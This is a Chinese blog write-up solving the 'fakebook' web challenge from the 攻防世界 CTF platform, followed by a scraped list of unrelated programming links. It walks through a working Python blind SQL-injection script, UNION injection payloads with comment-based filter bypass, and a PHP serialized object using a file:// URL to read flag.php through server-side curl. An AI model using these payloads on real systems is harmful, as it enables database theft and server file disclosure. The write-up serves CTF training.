SheepLeeeee
SheepLeeeee

攻防世界web题-fakebook

查看页面

进去页面发现有个登陆和注册,先注册了个账号,登陆后发现url有个no的get参数=1,猜测存在sql注入,构建语句1 and 1=1,页面返回正常,确认存在sql注入。构建语句错误,返回页面。
在这里插入图片描述
数据库为MariaDB,属于mysql的一种。

基于报错的bool盲注注入

尝试union联合发现语句报错,被过滤了无法使用,但是有报错回显,可以使用基于报错的bool盲注。

爆数据库名

先使用length爆数据库名字长度
exp

for i in range(100): #爆数据库名字长度
    sql_length = "1 and length(database())="+str(i) #查询的payload
    no = {'no':sql_length} #参数
    res = requests.get(url=url, headers=head, params=no)  # 发起get请求
    if re.findall("admin",res.text): #匹配是否找到
        db_len=i
        print("名字长度:",db_len)
        break

查询后得知数据库名字长度为8
攻防世界web题-fakebook_第1张图片
知道长度后爆数据库名,利用substr()函数

substr(strings|express,m,[n])
strings|express :被截取的字符串或字符串表达式
m 从第m个字符开始截取
n 截取后字符串长度为n

exp

for i in range(1,db_len+1):
    for j in dic:
        sql_dbname = "1 and substr(database(),"+str(i)+",1)="+"\'"+j+"\'"
        no = {'no': sql_dbname}  # 参数
        res = requests.get(url=url, headers=head, params=no)  # 发起get请求
        if re.findall("admin", res.text):  # 匹配是否找到
            db_name = db_name + j
            break
print("数据库名:",db_name)

攻防世界web题-fakebook_第2张图片
得知数据库名为fakebook,接下来爆表名

联合union注入

爆表名的时候,查表的个数的时候寄了,看了别的大佬的wp,发现这里可以用//union//绕过然后联合查询。之前知道了数据库名字这里直接用information_schema表查表名。
构建payload:

1 and 1=2 /**/union/**/ select 1,group_concat(table_name),2,3  from information_schema.tables where table_schema='fakebook'

查询到只有一张表users
攻防世界web题-fakebook_第3张图片
查询字段
payload:

1 and 1=2 /**/union/**/ select 1,group_concat(column_name),2,3  from information_schema.columns where table_name='users'

在这里插入图片描述
查看data
payload:

1 and 1=2 /**/union/**/ select 1,data,2,3 from users

在这里插入图片描述
找到一个序列化的式子,通过这里我们可以知道数据在数据库里是序列化后存储的,以为只是注入,没想到还有序列化,果然还是我想的太简单了。

序列化

御剑扫后台发现了flag.php,robots.txt.先看以下flag.php
攻防世界web题-fakebook_第4张图片
存在文件但是看不到内容,再看看robots.txt
攻防世界web题-fakebook_第5张图片
又找到了一个文件,查看
下载了一个文本。




class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

代码审计发现,这里使用了cuit_init()用来初始化一个curl会话,而curl可以使用file伪协议读取文件。
结合我们所得到的信息,flag应该在flag.php的源码中,但是flag.php对我们传入了序列化后的参数,这里应该要用到file:\伪协议读取flag.php的源码信息。利用下载的代码信息,得到序列化后的参数信息,最终通过sql注入来读取到flag的信息。

class UserInfo
{
    public $name = "1";
    public $age = 1;
    public $blog = "file:///var/www/html/flag.php";
}
$x = new UserInfo;
echo serialize($x);

运行得到序列化后的参数:

O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

构建最终payload:

1 and 1=2 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

攻防世界web题-fakebook_第6张图片
查看源代码
在这里插入图片描述
得到了base64加密的flag文件解密后得到
攻防世界web题-fakebook_第7张图片
成功得到flag

总结

本来以为是暴力跑数据库,没想到绕union,结果整半天给自己整寄了,还是太菜了,哭。没有全部信息先查看,结果弄得忙手忙脚,最后整了半天,才发现是通过注入发现数据库存储的信息经过了序列化,然后构造序列化的file伪协议读取文件,最后通过sql注入查询出来的就是反序列化后的信息file:\\var\html\www]flag.php。寄!

你可能感兴趣的:(php,python,网络安全)

  • 出现 xxx missing 1 required positional argument: ‘self‘ 解决方法 码农研究僧 BUGpythonbug
    目录1.问题所示2.原理分析3.解决方法1.问题所示编译代码的时候,出现如下问题:E:\software\anaconda3\envs\py3.10\python.exeF:\python_project\test\main.pyTraceback(mostrecentcalllast):File"F:\python_project\test\main.py",line36,
  • 12.2 Python绝对路径和相对路径详解 愿与你共信仰 第12章Python文件操作(I/O)python基础超详细
    在介绍绝对路径和相对路径之前,先要了解一下什么是当前工作目录。什么是当前工作目录每个运行在计算机上的程序,都有一个“当前工作目录”(或cwd)。所有没有从根文件夹开始的文件名或路径,都假定在当前工作目录下。注意,虽然文件夹是目录的更新的名称,但当前工作目录(或当前目录)是标准术语,没有当前工作文件夹这种说法。在Python中,利用os.getcwd()函数可以取得当前工作路径的字符串,还可以利用o
  • python爬虫处理滑块验证_python selenium爬虫滑块验证 用户6731453637 python爬虫处理滑块验证
    importrandomimporttimefromPILimportImagefromioimportBytesIOimportrequestsasrqfrombs4importBeautifulSoupasbsfromseleniumimportwebdriverfromselenium.webdriverimportActionChainsfromselenium.webdriverimpo
  • pandas读取带有表头的数据文件,读取无表头的数据文件 小桥流水---人工智能 人工智能深度学习Python程序代码pandas
    在Python中使用pandas库读取数据时,常见的问题之一就是如何处理数据文件中的表头。1.引入pandas库在开始之前,我们首先需要导入pandas库。如果你的环境中还未安装pandas,可以使用pip安装:pipinstallpandas导入pandas库:importpandasaspd2.读取带有表头的数据文件当数据文件中包含表头时,pandas会默认将第一行数据作为DataFrame的
  • python unittest TypeError setUpClass missing 1 required positional argument cls Kelly雨薇 python框架
    pythonunittest框架使用可以用两种方法:(1)所有内容写在一个python文件里eg:https://blog.csdn.net/panyueke/article/details/85305223(2)function与主框架隔离eg:functions.pydeffun_div(x):returnx/2deffun_add(x):returnx+2deffun_minus(x):re
  • 程式语言区分 白总Server htmlpythonjavac++开发语言
    程序语言有很多种,每种都有其特定的用途和特点。以下是一些广泛使用的编程语言:1.Python:易于学习,广泛用于数据科学、机器学习、网络开发、自动化等领域。2.Java:广泛应用于企业级应用、安卓开发、大型系统开发等。3.C:一种基础语言,广泛用于系统编程、嵌入式开发、操作系统等领域。4.C++:C语言的扩展,支持面向对象编程,用于游戏开发、高性能应用等。5.JavaScript:主要用于网页前端
  • 【python3.3.2】 首次接触python print 出现SyntaxError: invalid syntax 唯落瑾年 python
    3.0以后的print都改为了print();>>>print'hello'SyntaxError:invalidsyntax>>>print('hello')hello>>>print(2*8)16
  • missing 1 required positional argument: ‘self‘ baidu_huihui selfstaticmethodclassmethod
    missing1requiredpositionalargument:'self'解释:这个错误通常发生在Python中使用类方法时,你没有正确地使用self参数。在Python中,实例方法必须至少有一个参数,通常被命名为self,它代表实例本身。当你在类中定义一个方法时,Python会自动将这个self参数加入到方法参数列表中。解决方法:确保你在类的方法定义中使用了self参数,并且在调用这个方
  • 2024年Python最全Python-Matplotlib可视化(1)——一文详解常见统计图的绘制(1) 2401_84558452 程序员pythonmatplotlib开发语言
    importmatplotlib.pyplotaspltx=range(50)y=[value*2forvalueinx]plt.plot(x,y)plt.show()上述代码将会绘制曲线y=2*x,其中x在[0,50]范围内,如下所示:可以看到窗口上方还包含多个图标,其中:|项目|Value||—|—|||此按钮用于将所绘制的图形另存为所需格式的图片,包括png,jpg,pdf,svg等常见格式
  • Python魔法之旅-魔法方法(01) 神奇夜光杯 python开发语言魔法方法学习和成长基础知识
    目录一、概述1、定义2、作用二、主要应用场景1、构造和析构2、操作符重载3、字符串和表示4、容器管理5、可调用对象6、上下文管理7、属性访问和描述符8、迭代器和生成器9、数值类型10、复制和序列化11、自定义元类行为12、自定义类行为13、类型检查和转换14、自定义异常三、学习方法1、理解基础2、查阅文档3、编写示例4、实践应用5、阅读他人代码6、参加社区讨论7、持续学习8、练习与总结9、注意兼容
  • Python中的绝对路径与相对路径详解 小桥流水---人工智能 人工智能Python程序代码机器学习算法python开发语言
    对路径与相对路径Python中的绝对路径与相对路径详解什么是路径?绝对路径优点:缺点:示例:相对路径优点:缺点:示例:Python中如何使用**重点内容**:**在Python中,建议使用`os.path.join`来构建路径,这样可以确保代码在不同操作系统上的兼容性。同时,理解并正确使用绝对路径和相对路径,对于开发可移植和可维护的应用程序至关重要。**结论Python中的绝对路径与相对路径详解在
  • python列表添加列表_Python中列表(List)方法(基础) weixin_39843338 python列表添加列表
    列表是最常用的Python数据类型,它可以作为一个方括号内的逗号分隔值出现。列表的数据项不需要具有相同的类型。Python列表赋值list1=[‘physics’,‘chemistry’,1997,2000];list2=[1,2,3,4,5];list3=[“a”,“b”,“c”,“d”];Python调用列表中的值list1=[‘physics’,‘chemistry’,1997,2000];
  • Python安装NumPy 0阿齐兹0 阿齐兹的PyCV学习笔记pythonnumpy
    打开cmd通过python和pip安装:C:\"ProgramFiles"\Python36\python.exe-mpipinstall--usernumpyscipymatplotlibipythonjupyterpandassympynose参考资料:https://www.scipy.org/install.html
  • python-列表list(详细) 一个小白白YYDS python开发语言
    文章目录1、列表概念2、列表对象的创建3、列表访问3.1.索引获取列表元素3.2、嵌套列表索引获取列表元素3.3、获取指定元素的索引4、查询列表5、列表增加6、列表删除7、列表修改8、列表排序9、列表生成式1、列表概念语法:使用方括号[]括起来以逗号分隔的数据特性:列表是有序的同一个列表可以包含不同类型的数据列表中的元素可以重复出现可以通过索引的方式来访问列表的元素列表可以嵌套列表列表的元素可以修
  • python numpy安装步骤-NumPy 安装 编程大乐趣
    NumPy安装Python官网上的发行版是不包含NumPy模块的。我们可以使用以下几种方法来安装。1、使用已有的发行版本对于许多用户,尤其是在Windows上,最简单的方法是下载以下的Python发行版,它们包含了所有的关键包(包括NumPy,SciPy,matplotlib,IPython,SymPy以及Python核心自带的其它包):Anaconda:免费Python发行版,用于进行大规模数据
  • python中列表的常见操作 945048125 pythonpython
    列表的相关操作列表中存放的数据是可以进行修改的,比如"增"、"删"、"改""添加元素("增"append,extend,insert)1.append:在列表的末尾进行添加>>>a=[123,345]>>>a.append(678)>>>a[123,345,678]2.extend可以将另一个集合中的元素逐一添加到列表中a=['a','b','c']b=['d','e','f']>>>a.exte
  • Python的字符串操作 心繁 python开发语言
    1、获取元素1.1索引索引是最简单的获取元素的方式。根据元素在字符串的下标位置直接输出想要获取的一个元素。例:print(str[1])str="Imissyousomuch,let'smeet."print(str[2])#输出结果为:“m”1.2切片切片可以根据元素的下标位置获取想要的多个元素。例:print(str[2:10:1]),即:print(字符串名称[起始元素下标:结束元素下标+1
  • 【Python/Java/C++三种语言】20天拿下华为OD笔试之【位运算】2023B-出错的或电路【欧弟算法】全网注释最详细分类最全的华为OD真题 闭着眼睛学算法 最新华为OD真题#数学#位运算算法pythonjava
    文章目录题目描述与示例题目描述输入描述输出描述示例一输入输出说明示例二输入输出说明解题思路代码PythonJavaC++时空复杂度华为OD算法/大厂面试高频题算法练习冲刺训练题目描述与示例题目描述某生产门电路的厂商发现某一批次的或门电路不稳定,具体现象为计算两个二进制数的或操作时,第一个二进制数中某两个比特位会出现交换,交换的比特位置是随机的,但只交换这两个位,其他位不变。很明显,这个交换可能会影
  • 「 网络安全常用术语解读 」同源策略SOP详解:没有SOP就没有隐私 全栈安全 安全术语web安全安全术语
    同源策略可保护用户的隐私和数据安全,防止恶意网站通过跨域请求(例如,通过JavaScript)访问或修改其他网站的数据。1.同源策略产生背景当浏览器从一个域发送一个HTTP请求到另一个域时,与另一个域相关的任何cookies,包括身份验证会话cookie,也会作为请求的一部分发送。如果没有同源策略,如果你访问一个恶意网站,该网站将能够读取你的电子邮件、私人消息等。2.同源策略定义同源策略(Same
  • 【附源码】基于flask框架基于物联网技术的水质实时监测系统设计与实现 后台(python+mysql+论文) node-php毕设程序源码 pythonflaskmysql
    本系统(程序+源码)带文档lw万字以上文末可获取本课题的源码和程序系统程序文件列表系统的选题背景和意义选题背景:随着物联网技术的迅猛发展,其在环境监测方面的应用日益广泛,特别是水质监测这一重要领域。传统的水质监测方法通常需要人工采集样本后送至实验室分析,这种方法不仅耗时耗力,而且实时性差,难以满足快速响应和预警的需求。因此,基于物联网技术的水质实时监测系统应运而生,通过传感器网络实时收集水质数据,
  • 备战2024数学建模国赛(模型三十):遗传算法 优秀案例(三) 变循环发动机部件法建模及优化 2024年数学建模国赛 备战2024数学建模国赛2024数学建模(不代写论文请勿盲目订阅)数学建模2024年数学建模国赛备战数学建模国赛算法遗传算法2024
    专栏内容(赛前预售价99,比赛期间299):2024数学建模国赛期间会发布思路、代码和优秀论文。(本专栏达不到国一的水平,适用于有一点点基础冲击省奖的同学,近两年有二十几个国二,但是达不到国一,普遍获得省奖,请勿盲目订阅)python全套教程(一百篇博客):从新手到掌握使用python,可以对数学建模问题进行建模分析。35套模型算法(优秀论文示例):马尔科夫模型、遗传算法、逻辑回归、逐步回归、蚁群
  • 网络安全(黑客技术)—2024自学手册 一个迷人的黑客 web安全安全网络学习网络安全信息安全渗透测试
    前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习导航三大章节,涉及价值观、方法论、执行力、行业分类、职位解读、法
  • 如何用3个月零基础入门网络安全?_网络安全零基础怎么学习 白帽黑客啊一 web安全学习安全网安入门flutter
    前言写这篇教程的初衷是很多朋友都想了解如何入门/转行网络安全,实现自己的“黑客梦”。文章的宗旨是:1.指出一些自学的误区2.提供客观可行的学习表3.推荐我认为适合小白学习的资源.大佬绕道哈!→点击获取网络安全资料·攻略←一、自学网络安全学习的误区和陷阱1.不要试图先成为一名程序员(以编程为基础的学习)再开始学习我在之前的回答中,我都一再强调不要以编程为基础再开始学习网络安全,一般来说,学习编程不但
  • 【网络安全 | 渗透工具】IIS 短文件名枚举工具—shortscan安装使用教程 秋说 渗透工具web安全漏洞挖掘渗透工具
    未经许可,不得转载。文章目录shortscan安装使用Shortutil工具shortscanShortScan是一种用于在MicrosoftIIS(InternetInformationServices)Web服务器上进行短文件名枚举的工具。该工具可以帮助攻击者利用IIS的文件名处理特性,通过预测性扫描枚举服务器上的文件和目录名称。背景:在早期的Windows文件系统(如FAT和NTFS)中,每
  • 2024网安周今日开幕,亚信安全亮相30城 亚信安全官方账号 信息安全亚信安全数据安全网络安全
    2024年国家网络安全宣传周今天在广州拉开帷幕。今年网安周继续以“网络安全为人民,网络安全靠人民”为主题。2024年国家网络安全宣传周涵盖了1场开幕式、1场高峰论坛、5个重要活动、15场分论坛/座谈会/闭门会、6个主题日活动和网络安全“六进”活动。亚信安全出席2024年国家网络安全宣传周开幕式和主论坛,并将通过线下宣讲、创意科普、成果展示等多种形式,让广大民众看得懂、记得住安全知识,同时还配合各地
  • SpringMVC的架构有什么优势?——视图与模型(二) 不会编程的小孩子 架构
    #SpringMVC的架构有什么优势?——视图与模型(二)前言关键字:机器学习人工智能AIchatGPT学习实现使用搭建深度python事件远程dockermysql安全技术部署技术自动化代码视图(View)视图是展示结果的组件,它们负责渲染模型数据并生成HTML输出。SpringMVC支持多种视图技术,包括JSP、Thymeleaf等。视图(View)是SpringMVC中渲染并呈现结果的组件,
  • 【华为笔试题汇总】2024-05-22-华为春招笔试题-三语言题解(Python/Java/Cpp) 春秋招笔试突围 华为春秋招笔试题汇总最新互联网春秋招试题合集华为pythonjava算法
    大家好这里是清隆学长,一枚热爱算法的程序员✨本系列打算持续跟新小米近期的春秋招笔试题汇总~ACM银牌|多次AK大厂笔试|编程一对一辅导感谢大家的订阅➕和喜欢清隆这边最近正在收集近一年互联网各厂的笔试题汇总,如果有需要的小伙伴可以关注后私信一下清隆领取,会在飞书进行同步的跟新。文章目录01.获取公共链表片段问题描述输入格式输出格式样例输入样例输出数据范围题解参考代码02.矿车运输成本问题描述输入格式
  • 【网络安全】漏洞挖掘之会话管理缺陷 秋说 网络安全web安全漏洞挖掘会话管理
    未经许可,不得转载。文章目录正文正文目标:example.com该站点允许存在主要邮箱和次要邮箱。在尝试使用次要邮箱和密码登录时,由于账户最初是通过主邮箱创建的,无法登录。于是,我通过次要邮箱使用GoogleOAuth进行登录。令人意外的是,我成功通过GoogleOAuth登录了该账户。接着,我在两个浏览器上登录了同一个账户:Chrome浏览器使用主邮箱([email protected])和
  • Python 统计字符串里每个字符出现的次数的三种方法 咻咻职位搜索引擎 后端开发Pythonpython字符统计字典
    记录一下,怕忘记了~setdefault()的介绍介绍:setdefault()方法提供了一种方式,在一行中完成这件事。传递给该方法的第一个参数,是要检查的键。第二个参数,是如果该键不存在时要设置的值。如果该键确实存在,方法就会返回键的值~spam={'name':'Pooka','age':5}print(spam.setdefault('color','black'))>>blackprint
  • Python:统计字符串中各元素出现的次数 陈小q Python秋招笔试
    统计String中每个单词出现的个数(不区分大小写)输入描述:输入一个字符串,例如:“abAv”输出描述:v:1:3b:1a:2defcountEach(strs):dic={}strs=strs.lower()lens=len(strs)i=0whilei
  • 桌面上有多个球在同时运动,怎么实现球之间不交叉,即碰撞? 换个号韩国红果果 html小球碰撞
    稍微想了一下,然后解决了很多bug,最后终于把它实现了。其实原理很简单。在每改变一个小球的x y坐标后,遍历整个在dom树中的其他小球,看一下它们与当前小球的距离是否小于球半径的两倍?若小于说明下一次绘制该小球(设为a)前要把他的方向变为原来相反方向(与a要碰撞的小球设为b),即假如当前小球的距离小于球半径的两倍的话,马上改变当前小球方向。那么下一次绘制也是先绘制b,再绘制a,由于a的方向已经改变
  • 《高性能HTML5》读后整理的Web性能优化内容 白糖_ html5
    读后感         先说说《高性能HTML5》这本书的读后感吧,个人觉得这本书前两章跟书的标题完全搭不上关系,或者说只能算是讲解了“高性能”这三个字,HTML5完全不见踪影。个人觉得作者应该首先把HTML5的大菜拿出来讲一讲,再去分析性能优化的内容,这样才会有吸引力。因为只是在线试读,没有机会看后面的内容,所以不胡乱评价了。  
  • [JShop]Spring MVC的RequestContextHolder使用误区 dinguangx jeeshop商城系统jshop电商系统
        在spring mvc中,为了随时都能取到当前请求的request对象,可以通过RequestContextHolder的静态方法getRequestAttributes()获取Request相关的变量,如request, response等。         在jshop中,对RequestContextHolder的
  • 算法之时间复杂度 周凡杨 java算法时间复杂度效率
          在 计算机科学 中, 算法 的时间复杂度是一个 函数 ,它定量描述了该算法的运行时间。这是一个关于代表算法输入值的 字符串 的长度的函数。时间复杂度常用 大O符号 表述,不包括这个函数的低阶项和首项系数。使用这种方式时,时间复杂度可被称为是 渐近 的,它考察当输入值大小趋近无穷时的情况。 这样用大写O()来体现算法时间复杂度的记法,
  • Java事务处理 g21121 java
    一、什么是Java事务 通常的观念认为,事务仅与数据库相关。 事务必须服从ISO/IEC所制定的ACID原则。ACID是原子性(atomicity)、一致性(consistency)、隔离性(isolation)和持久性(durability)的缩写。事务的原子性表示事务执行过程中的任何失败都将导致事务所做的任何修改失效。一致性表示当事务执行失败时,所有被该事务影响的数据都应该恢复到事务执行前的状
  • Linux awk命令详解 510888780 linux
    一.  AWK 说明   awk是一种编程语言,用于在linux/unix下对文本和数据进行处理。数据可以来自标准输入、一个或多个文件,或其它命令的输出。它支持用户自定义函数和动态正则表达式等先进功能,是linux/unix下的一个强大编程工具。它在命令行中使用,但更多是作为脚本来使用。    awk的处理文本和数据的方式:它逐行扫描文件,从第一行到
  • android permission 布衣凌宇 Permission
    <uses-permission android:name="android.permission.ACCESS_CHECKIN_PROPERTIES" ></uses-permission>允许读写访问"properties"表在checkin数据库中,改值可以修改上传 <uses-permission android:na
  • Oracle和谷歌Java Android官司将推迟 aijuans javaoracle
    北京时间 10 月 7 日,据国外媒体报道,Oracle 和谷歌之间一场等待已久的官司可能会推迟至 10 月 17 日以后进行,这场官司的内容是 Android 操作系统所谓的 Java 专利权之争。本案法官 William Alsup 称根据专利权专家 Florian Mueller 的预测,谷歌 Oracle 案很可能会被推迟。  该案中的第二波辩护被安排在 10 月 17 日出庭,从目前看来
  • linux shell 常用命令 antlove linuxshellcommand
    grep [options] [regex] [files] /var/root # grep -n "o" * hello.c:1:/* This C source can be compiled with:
  • Java解析XML配置数据库连接(DOM技术连接 SAX技术连接) 百合不是茶 sax技术Java解析xml文档dom技术XML配置数据库连接
        XML配置数据库文件的连接其实是个很简单的问题,为什么到现在才写出来主要是昨天在网上看了别人写的,然后一直陷入其中,最后发现不能自拔 所以今天决定自己完成 ,,,,现将代码与思路贴出来供大家一起学习   XML配置数据库的连接主要技术点的博客; JDBC编程 : JDBC连接数据库 DOM解析XML:  DOM解析XML文件 SA
  • underscore.js 学习(二) bijian1013 JavaScriptunderscore
            Array Functions 所有数组函数对参数对象一样适用。1.first   _.first(array, [n])   别名: head, take       返回array的第一个元素,设置了参数n,就
  • plSql介绍 bijian1013 oracle数据库plsql
    /* * PL/SQL 程序设计学习笔记 * 学习plSql介绍.pdf * 时间:2010-10-05 */ --创建DEPT表 create table DEPT ( DEPTNO NUMBER(10), DNAME NVARCHAR2(255), LOC NVARCHAR2(255) ) delete dept; select
  • 【Nginx一】Nginx安装与总体介绍 bit1129 nginx
    启动、停止、重新加载Nginx nginx 启动Nginx服务器,不需要任何参数u nginx -s stop 快速(强制)关系Nginx服务器 nginx -s quit 优雅的关闭Nginx服务器 nginx -s reload 重新加载Nginx服务器的配置文件 nginx -s reopen 重新打开Nginx日志文件  
  • spring mvc开发中浏览器兼容的奇怪问题 bitray jqueryAjaxspringMVC浏览器上传文件
        最近个人开发一个小的OA项目,属于复习阶段.使用的技术主要是spring mvc作为前端框架,mybatis作为数据库持久化技术.前台使用jquery和一些jquery的插件.     在开发到中间阶段时候发现自己好像忽略了一个小问题,整个项目一直在firefox下测试,没有在IE下测试,不确定是否会出现兼容问题.由于jquer
  • Lua的io库函数列表 ronin47 lua io
    1、io表调用方式:使用io表,io.open将返回指定文件的描述,并且所有的操作将围绕这个文件描述   io表同样提供三种预定义的文件描述io.stdin,io.stdout,io.stderr   2、文件句柄直接调用方式,即使用file:XXX()函数方式进行操作,其中file为io.open()返回的文件句柄   多数I/O函数调用失败时返回nil加错误信息,有些函数成功时返回nil
  • java-26-左旋转字符串 bylijinnan java
    public class LeftRotateString { /** * Q 26 左旋转字符串 * 题目:定义字符串的左旋转操作:把字符串前面的若干个字符移动到字符串的尾部。 * 如把字符串abcdef左旋转2位得到字符串cdefab。 * 请实现字符串左旋转的函数。要求时间对长度为n的字符串操作的复杂度为O(n),辅助内存为O(1)。 */ pu
  • 《vi中的替换艺术》-linux命令五分钟系列之十一 cfyme linux命令
    vi方面的内容不知道分类到哪里好,就放到《Linux命令五分钟系列》里吧! 今天编程,关于栈的一个小例子,其间我需要把”S.”替换为”S->”(替换不包括双引号)。 其实这个不难,不过我觉得应该总结一下vi里的替换技术了,以备以后查阅。   1 所有替换方案都要在冒号“:”状态下书写。 2 如果想将abc替换为xyz,那么就这样 :s/abc/xyz/ 不过要特别
  • [轨道与计算]新的并行计算架构 comsci 并行计算
         我在进行流程引擎循环反馈试验的过程中,发现一个有趣的事情。。。如果我们在流程图的每个节点中嵌入一个双向循环代码段,而整个流程中又充满着很多并行路由,每个并行路由中又包含着一些并行节点,那么当整个流程图开始循环反馈过程的时候,这个流程图的运行过程是否变成一个并行计算的架构呢?      
  • 重复执行某段代码 dai_lm android
    用handler就可以了 private Handler handler = new Handler(); private Runnable runnable = new Runnable() { public void run() { update(); handler.postDelayed(this, 5000); } }; 开始计时 h
  • Java实现堆栈(list实现) datageek 数据结构——堆栈
    public interface IStack<T> { //元素出栈,并返回出栈元素 public T pop(); //元素入栈 public void push(T element); //获取栈顶元素 public T peek(); //判断栈是否为空 public boolean isEmpty
  • 四大备份MySql数据库方法及可能遇到的问题 dcj3sjt126com DBbackup
    一:通过备份王等软件进行备份前台进不去? 用备份王等软件进行备份是大多老站长的选择,这种方法方便快捷,只要上传备份软件到空间一步步操作就可以,但是许多刚接触备份王软件的客用户来说还原后会出现一个问题:因为新老空间数据库用户名和密码不统一,网站文件打包过来后因没有修改连接文件,还原数据库是好了,可是前台会提示数据库连接错误,网站从而出现打不开的情况。 解决方法:学会修改网站配置文件,大多是由co
  • github做webhooks:[1]钩子触发是否成功测试 dcj3sjt126com githubgitwebhook
    转自: http://jingyan.baidu.com/article/5d6edee228c88899ebdeec47.html github和svn一样有钩子的功能,而且更加强大。例如我做的是最常见的push操作触发的钩子操作,则每次更新之后的钩子操作记录都会在github的控制板可以看到! 工具/原料 github 方法/步骤
  • ">的作用" target="_blank">JSP中的作用 蕃薯耀
    JSP中<base href="<%=basePath%>">的作用 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  • linux下SAMBA服务安装与配置 hanqunfeng linux
    局域网使用的文件共享服务。 一.安装包: rpm -qa | grep samba samba-3.6.9-151.el6.x86_64 samba-common-3.6.9-151.el6.x86_64 samba-winbind-3.6.9-151.el6.x86_64 samba-client-3.6.9-151.el6.x86_64 samba-winbind-clients
  • guava cache IXHONG cache
    缓存,在我们日常开发中是必不可少的一种解决性能问题的方法。简单的说,cache 就是为了提升系统性能而开辟的一块内存空间。   缓存的主要作用是暂时在内存中保存业务系统的数据处理结果,并且等待下次访问使用。在日常开发的很多场合,由于受限于硬盘IO的性能或者我们自身业务系统的数据处理和获取可能非常费时,当我们发现我们的系统这个数据请求量很大的时候,频繁的IO和频繁的逻辑处理会导致硬盘和CPU资源的
  • Query的开始--全局变量,noconflict和兼容各种js的初始化方法 kvhur JavaScriptjquerycss
    这个是整个jQuery代码的开始,里面包含了对不同环境的js进行的处理,例如普通环境,Nodejs,和requiredJs的处理方法。 还有jQuery生成$, jQuery全局变量的代码和noConflict代码详解  完整资源: http://www.gbtags.com/gb/share/5640.htm jQuery 源码:   (
  • 美国人的福利和中国人的储蓄 nannan408
       今天看了篇文章,震动很大,说的是美国的福利。    美国医院的无偿入院真的是个好措施。小小的改善,对于社会是大大的信心。小孩,税费等,政府不收反补,真的体现了人文主义。    美国这么高的社会保障会不会使人变懒?答案是否定的。正因为政府解决了后顾之忧,人们才得以倾尽精力去做一些有创造力,更造福社会的事情,这竟成了美国社会思想、人
  • N阶行列式计算(JAVA) qiuwanchi N阶行列式计算
    package gaodai; import java.util.List; /** * N阶行列式计算 * @author 邱万迟 * */ public class DeterminantCalculation { public DeterminantCalculation(List<List<Double>> determina
  • C语言算法之打渔晒网问题 qiufeihu c算法
    如果一个渔夫从2011年1月1日开始每三天打一次渔,两天晒一次网,编程实现当输入2011年1月1日以后任意一天,输出该渔夫是在打渔还是在晒网。 代码如下:   #include <stdio.h> int leap(int a) /*自定义函数leap()用来指定输入的年份是否为闰年*/ { if((a%4 == 0 && a%100 != 0
  • XML中DOCTYPE字段的解析 wyzuomumu xml
    DTD声明始终以!DOCTYPE开头,空一格后跟着文档根元素的名称,如果是内部DTD,则再空一格出现[],在中括号中是文档类型定义的内容. 而对于外部DTD,则又分为私有DTD与公共DTD,私有DTD使用SYSTEM表示,接着是外部DTD的URL. 而公共DTD则使用PUBLIC,接着是DTD公共名称,接着是DTD的URL.   私有DTD <!DOCTYPErootSYST
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他